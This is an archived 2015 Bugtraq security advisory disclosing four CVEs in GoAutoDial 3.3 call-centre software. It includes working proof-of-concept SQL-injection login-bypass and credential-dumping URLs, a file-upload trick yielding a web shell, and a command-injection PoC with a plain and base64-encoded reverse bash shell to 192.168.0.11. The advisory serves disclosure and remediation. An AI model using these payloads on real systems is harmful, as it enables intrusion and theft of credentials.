lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201504211331.t3LDVXmP021042@sf01web2.securityfocus.com>
Date: Tue, 21 Apr 2015 13:31:33 GMT
From: root@...alhost.com
To: bugtraq@...urityfocus.com
Subject: GoAutoDial 3.3 multiple vulnerabilities

Affected software: GoAutoDial
Affected version: 3.3-1406088000 (GoAdmin) and previous releases of GoAutodial 3.3
Associated CVEs: CVE-2015-2842, CVE-2015-2843, CVE-2015-2844, CVE-2015-2845
Vendor advisory: http://goautodial.org/news/21

Abstract:
Multiple vulnerabilties exist in the GoAutodial 3.3 open source call centre software that will lead to a complete compromise of the underlying database and infrastructure.

Given that multiple product updates were released during testing that do not include any code changes related to the described vulnerabilities, any version between 3.3-1406088000 and 3.3-1421902800 might also be vulnerable.
Refer to the product changelog.txt: https://github.com/goautodial/ce-www/blob/master/changelog.txt

==================================
1/ CVE-2015-2843 
 -  SQLi authentication bypass due to lack of input sanitisation
Affected file: go_login.php
Issue: Lack of input sanitisation on input parameters user_name and user_pass prior to being handled by the database.

A simple 'OR '1'='1 in the password field with a username of 'admin' will log you in. (assuming the default administrator user has not been removed).
You can also test this by performing the following GET request:

PoC:
https://<ip>/go_login/validate_credentials/admin/' OR '1'='1
 
 -  SQLi within the 'go_get_user_info' function
Affected file: go_site.php
Issue: Lack of input sanitisation on input parameters being handled by the database

This function returns a single entry from the db that contains user information including the username and password. 
Given that the first 'active' user in the db would most likely be the admin user you can search for active=Y. There is a column in the vicidial_users table that identifies whether a user is active (Y) or not active (N).
Given this, you can perform the following to return an admin user's account username and password.

PoC:
https://<ip>/index.php/go_site/go_get_user_info/' or active='Y 

==================================
2/ CVE-2015-2842
 -  Arbitrary file upload within the 'audiostore' upload functionality
Affected file: go_audiostore.php
Issue: Filename extensions are not properly checked to ensure only 'audio' files can be uploaded

A user can upload a file with the filename 'bogus.wav.php'. The filename is checked for the '.wav' extension and the check is passed, however with the trailing '.php' file extension, much fun is obtained.
An uploaded file is moved to a symlinked directory (/var/lib/asterisk/sounds) of which can be viewed directly from the browser. 
Note*: All user uploaded files are given the 'go_' prefix. This example ends up with 'go_bogus.wav.php' as an uploaded file.

https://<ip>/sounds/go_bogus.wav.php
** Pop goes the shell **

==================================
3/ CVE-2015-2844 and CVE-2015-2845
 - Arbitrary command injection via the cpanel function due to lack of input sanitisation
Affected file: go_site.php
Issue: User supplied parameters are passed to the php 'exec' function, of which the intended function can be escaped to do more sinister things.

Two variables are passed to the underlying exec command, $action and $type. Either one can be used.
URI looks like this: https://<ip>/index.php/go_site/cpanel/$type/$action

Affected code: exec("/usr/share/goautodial/goautodialc.pl '/sbin/service $type ".strtolower($action)."'");

Base64 encoding bypasses any web server encoding and a lovely root shell is obtained.
** pop goes a root shell **
reverse bash shell one liner: bash -i >& /dev/tcp/192.168.0.11/4444 0>&1 

PoC:  
https://<ip>/index.php/go_site/cpanel/|| bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode\`"  

==================================
Vulnerability Remediation

Upgrade to version 3.3-1421902800 at a minimum.
As per the vendor advisory, follow the instructions provided in the link below.
http://goautodial.org/projects/goautodialce/wiki/GIThub

Metasploit module to be created at some point  though quick and dirty python scripts work just fine too...

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ